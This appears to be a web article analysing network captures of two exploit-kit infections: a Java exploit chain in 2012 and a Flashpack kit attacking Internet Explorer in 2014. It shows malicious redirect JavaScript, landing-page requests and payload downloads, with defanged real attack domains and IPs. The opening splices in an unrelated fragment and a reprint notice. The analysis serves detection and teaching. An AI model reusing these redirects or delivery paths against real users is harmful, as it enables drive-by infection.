Detailed,Analysis,the,processe computer Detailed Analysis of the processes and stages of an Exploit

Gone are those times when the companies and the organisations didn't need a hi-tech system to handle them. Owing to the considerable increase in the business sector and thus, an enormous increase in the complexity of the organisational struc ----------------------------------------------------------Permission is granted for the below article to forward,reprint, distribute, use for ezine, newsletter, website,offer as free bonus or part of a product for sale as longas no changes a

Here you can see the webpage that the hackers exploited (arksylhet[.]com/A67iD4eo/index.html) and inserted within that page an iframe which includes a link to a Javascript Redirect file  2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394E…*.@…….j.+lF…P7_Z.X.X.P…...GET /Lk1SsGQm/js.js HTTP/1.1Host: web63.server77.publicompserver[.]deUser-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13Accept: */*Accept-Language: en-us,enq=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8q=0.7,*q=0.7Keep-Alive: 115Connection: keep-aliveReferer: http://arksylhet[.]com/A67iD4eo/index.html 2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472E…_…….+lF..j..P..X.X.7_|P…D…HTTP/1.1 200 OKDate: Wed, 19 Sep 2012 02:41:54 GMTServer: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8gLast-Modified: Wed, 19 Sep 2012 02:31:59 GMTETag: “894002-47-4ca04cfa1a5c0″Accept-Ranges: bytesContent-Length: 71Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: application/javascript document.location=’http://69.194.193.34/links/systems-links_warns.php'   <—  The Javascript file simple contains a document.location variable that redirects the user to the landing page of the exploit kit Redirection to the landing page, note that the referer below is the same link the Javascript had coded in it 2012-09-18 22:41:43.962836 IP 192.168.106.131.1414 > 69.194.193.34.80: Flags [P.], seq 1:540, ack 1, win 64240, length 539E..C*@@….d..j.E..”…P.=1.v…P…J:..GET /links/systems-links_warns.phpljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07 HTTP/1.1Host: 69.194.193.34User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13Accept: text/html,application/xhtml+xml,application/xmlq=0.9,*/*q=0.8Accept-Language: en-us,enq=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8q=0.7,*q=0.7Keep-Alive: 115Connection: keep-aliveReferer: http://69.194.193.34/links/systems-links_warns.phpThe victim is instructed to request the file “java.jar” which is a Java archive file containing the exploit for the vulnerable version of Java (1.7.0_06)2012-09-18 22:41:47.553965 IP 192.168.106.131.1415 > 69.194.193.34.80: Flags [P.], seq 1:274, ack 1, win 64240, length 273E..9*a@….M..j.E..”…P..GA.*.P…….GET /data/java.jar HTTP/1.1accept-encoding: pack200-gzip, gzipcontent-type: application/x-java-archive <— MIME TYPEUser-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06  <— Vulnerable version of JavaHost: 69.194.193.34Accept: text/html, image/gif, image/jpeg, * q=.2, */* q=.2Connection: keep-alive2012-09-18 22:41:48.092307 IP 69.194.193.34.80 > 192.168.106.131.1415: Flags [P.], seq 1:234, ack 274, win 64240, length 233E…`#……E..”..j..P..A.*...XP…3..HTTP/1.1 200 OKServer: nginx/0.7.67Date: Wed, 19 Sep 2012 02:42:01 GMTContent-Type: application/java-archiveConnection: keep-aliveContent-Length: 33010Last-Modified: Tue, 18 Sep 2012 07:17:22 GMTAccept-Ranges: bytes   So, at this point the victim has been redirected to the exploit kit site and an exploit has been delivered, how do we know the exploit kit did its job Below is the proof in the pudding, this is the request for a malicious executable file, we know that because there is no longer a referer in the GET request, the User-Agent will still be for Java and lastly the “accept-encoding: pack200-gzip, gzip” will not be in the request for the malicious file. 2012-09-18 22:41:51.821007 IP 192.168.106.131.1416 > 69.194.193.34.80: Flags [P.], seq 1:264, ack 1, win 64240, length 263E../*w@….A..j.E..”…P.<..`dv.P…a…GET /links/systems-links_warns.phpvf=0206360203&we=35353306040934370b06&r=02&pj=w&gc=r HTTP/1.1   <—- Pointer on the exploit kit server to an executable file (the GET request does not have to have .exe or .zip or anything of the sorts in it for it to be an executable request, it simply points to a location on the server. User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.7.0_06 Host: 69.194.193.34 Accept: text/html, image/gif, image/jpeg, * q=.2, */* q=.2 Connection: keep-alive   To confirm, we look at the servers response to the clients request:   2012-09-18 22:41:52.369258 IP 69.194.193.34.80 > 192.168.106.131.1416: Flags [P.], seq 1:1461, ack 264, win 64240, length 1460E…`s……E..”..j..P..`dv..<..P…….HTTP/1.1 200 OKServer: nginx/0.7.67Date: Wed, 19 Sep 2012 02:42:05 GMTContent-Type: application/x-msdownloadConnection: keep-aliveContent-Length: 131584X-Powered-By: PHP/5.3.14-1~dotdeb.0Pragma: publicExpires: Wed, 19 Sep 2012 02:42:04 GMTCache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment filename=”contacts.exe”     <—– There it is, the GET request resulted in the download of a file named “contacts.exe”Content-Transfer-Encoding: binary MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..   To summarize, at this point the exploit kit was able to successfully exploit the victims machine because it was able to make it download a file without the users consent by exploiting a vulnerability in Java that allowed a break out from the sandbox and onto the victims machine. This does not mean that the victim was infected by the file or that any malware is present on the machine. Anti-virus could have easily stopped it or another host based prevention system. The file may not have even been able to install properly.  Flashpack Web Based Exploit Kit Exploits an Internet Explorer vulnerability In this scenario, the victim is using Google Translate service to view a website, the website “hitcric.info” is a legitimate website hosting live Cricket (the sport) games that has been hacked.   2014-05-18 22:27:26.841394 IP 192.168.204.222.49381 > 89.46.102.34.80: Flags [P.], seq 1:430, ack 1, win 64240, length 429E…..@….,….Y.f”…[email protected].:[P….k..GET / HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://translate.google[.]com/translate_cdepth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQgAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible MSIE 10.0 Windows NT 6.1 WOW64 Trident/6.0)Accept-Encoding: gzip, deflateHost: hitcric[.]infoConnection: Keep-Alive 2014-05-18 22:27:27.030069 IP 89.46.102.34.80 > 192.168.204.222.49381: Flags [FP.], seq 1:520, ack 430, win 64240, length 519E../…….BY.f”…..P..3.:[@HF.P…,]..HTTP/1.1 302 Moved Temporarily   <—- The hackers have taken over the domain name and forwarded it to a web-based exploit kit, note the “Location:” pointerServer: nginx adminDate: Mon, 19 May 2014 02:13:42 GMTContent-Type: text/htmlContent-Length: 154Connection: closeLocation: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/index.php   s=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw==   The victim has now hit what is known as the “landing page”   2014-05-18 22:27:28.423985 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1:606, ack 1, win 64240, length 605E….’@………_..Z…P’.=.n.~cP…….GET /index.phps=dmpuc3Nwcz1mZGlzcWJhc20mdGltZT0xNDA1MTkwMjE3OTkxMDM3NTA4JnNyYz0yOTkmc3VybD1oaXRjcmljLmluZm8mc3BvcnQ9ODAma2V5PUU0NDZEMzA2JnN1cmk9Lw== HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://translate.google[.]com/translate_cdepth=1&hl=en&langpair=en%7Cen&rurl=translate.google[.]com&sandbox=0&u=http://hitcric[.]info/&usg=ALkJrhiGLwR0ZHj_UP5Ja9lbM5QmnYvMQgAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible MSIE 10.0 Windows NT 6.1 WOW64 Trident/6.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com 2014-05-18 22:27:28.906353 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 1:879, ack 606, win 64240, length 878E………c2_..Z…..P..n.~c’[email protected]…e…HTTP/1.1 200 OKServer: nginx/1.4.3Date: Mon, 19 May 2014 02:27:28 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-store, no-cache, must-revalidateExpires: Thu, 01 Jan 1970 00:00:01 +0000Content-Encoding: gzipVary: Accept-EncodingPASSES BROWSER INFORMATION BACK TO EXPLOIT KIT BELOW WITH THE GET REQUEST FOR “json.php” 2014-05-18 22:27:46.874353 IP 192.168.204.222.49383 > 95.154.246.90.80: Flags [P.], seq 1806:2505, ack 47970, win 62795, length 699E….A@….W…._..Z…P’.D.n.9.P..K.4..POST /tresting/avalonr/json.php HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com/tresting/avalonr/allow.phpAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible MSIE 10.0 Windows NT 6.1 WOW64 Trident/6.0)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]comContent-Length: 207Connection: Keep-AliveCache-Control: no-cache id=306a617661646273696c766572666c323031346d736965387c6c6579396e6275396334633572336f69653338313969743532393935336331383035333632663931613264313662366430373166643562302e6e73312e626179616e646f766d6563692e636f6d2014-05-18 22:27:46.874411 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [.], ack 2505, win 64240, length 0E..(……fk_..Z…..P..n.9.’.G.P….d……..2014-05-18 22:27:47.692844 IP 95.154.246.90.80 > 192.168.204.222.49383: Flags [P.], seq 47970:48554, ack 2505, win 64240, length 584E..p……d”_..Z…..P..n.9.’.G.P…L…HTTP/1.1 200 OKServer: nginx/1.4.3Date: Mon, 19 May 2014 02:27:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.3.3Sends the Internet Explorer exploit in a font file .eot which is in a binary file format, note the large content length 2014-05-18 22:27:48.285586 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 401:686, ack 972, win 63269, length 285E..E.[@………_..Z…PcS%&g^w6P..%….GET /tresting/avalonr/include/add8dc99221ed3fa474c85b43f3262ed.eot HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (compatible MSIE 10.0 Windows NT 6.1 WOW64 Trident/6.0)Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]comConnection: Keep-Alive2014-05-18 22:27:48.599716 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 972:2240, ack 686, win 64240, length 1268E………aH_..Z…..P..g^w6cS&CP….c..HTTP/1.1 200 OKServer: nginx/1.4.3Date: Mon, 19 May 2014 02:27:48 GMTContent-Type: application/octet-stream   <—- MIME type for a binary fileContent-Length: 22319   First exploit appears to have failed, here is another exploit attempt with a different exploit for Internet Explorer:2014-05-18 22:27:52.038864 IP 192.168.204.222.49388 > 95.154.246.90.80: Flags [P.], seq 686:842, ack 23546, win 64240, length 156E….d@….S…._..Z…PcS&Cg^.dP…….GET /tresting/avalonr/include/1f55ea0e76576767cbd3d4e266e5dacf.eot HTTP/1.1Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]comCache-Control: no-cache 2014-05-18 22:27:52.038923 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [.], ack 842, win 64240, length 0E..(.+….f(_..Z…..P..g^.dcS&.P…O5……..2014-05-18 22:27:52.327008 IP 95.154.246.90.80 > 192.168.204.222.49388: Flags [P.], seq 23546:24814, ack 842, win 64240, length 1268E….,….a3_..Z…..P..g^.dcS&.P…….HTTP/1.1 200 OKServer: nginx/1.4.3Date: Mon, 19 May 2014 02:27:52 GMTContent-Type: application/octet-streamContent-Length: 13312Connection: keep-aliveLast-Modified: Mon, 19 May 2014 02:25:29 GMTETag: “53796b99-3400″Accept-Ranges: bytes tc.9:999=999..99.9999999y99999999999999999999999999999999999.9997&.79.0…8u..mQPJ.IKV^KXT.ZXWWVM.[.KLW.PW.vj.TV].443.9999999..1…_C.._C.._C..^C.._C…C.._C…C.._C…C.._C…C.._C..C.._C…C.._CkPZQ.._C9999999999999999i|99u8=9..q99999999.97.28>39.9991999999 +999)999y9999P`9)99999<989<989=99999999I999=99..99:99=99=99)9999)99)999999)999i.99V999a.99A9999i999=9999999999999999999Y99E899.)99%99999999999999999999999999999999999A99.9999)99.999999999999999999999999999.MAM999..999)999.999=99999999999999.99Y.]XMX999)9999y999999.99999999999999y99..KJKZ9999=999i999=999.99999999999999y99y.KUVZ99.8999Y999999.99999999999999y99..q.999..qz999..qi989..qd999″.q^999(.qK99999999999TJOZKM.]UU9xoxip ..]UU9r|kw|u ..]UU9wmuu.uu9lj|k ..]UU9jq|uu ..]UU9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999   BOOM……this exploit has succeeded, the GET request for “loadsilver.php” is actually a pointer to a place on the exploit kit server for the file “e53796b9e8cb041400466334.exe” and as you can see below, another successful exploitation. Note: There is no discussion of malware here because there is no “callback” and in this example the executable fails to install properly as anti-virus quarantined the executable upon download (not that you could see that from network traffic).2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342E..~.u@………_..Z…P@)g.)m..P…=l..GET /tresting/avalonr/loadsilver.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible MSIE 7.0 Windows NT 6.1 WOW64 Trident/6.0 SLCC2 .NET CLR 2.0.50727 .NET CLR 3.5.30729 .NET CLR 3.0.30729 Media Center PC 6.0)Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]comConnection: Keep-Alive 2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0E..(.….f._..Z…..P..)m..@)i!P…0………2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268E….@….a._..Z…..P..)m..@)i!P….L..HTTP/1.1 200 OKServer: nginx/1.4.3Date: Mon, 19 May 2014 02:27:53 GMTContent-Type: application/octet-streamContent-Length: 94514Connection: keep-aliveX-Powered-By: PHP/5.3.3Accept-Ranges: bytesContent-Disposition: inline filename=e53796b9e8cb041400466334.exe MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..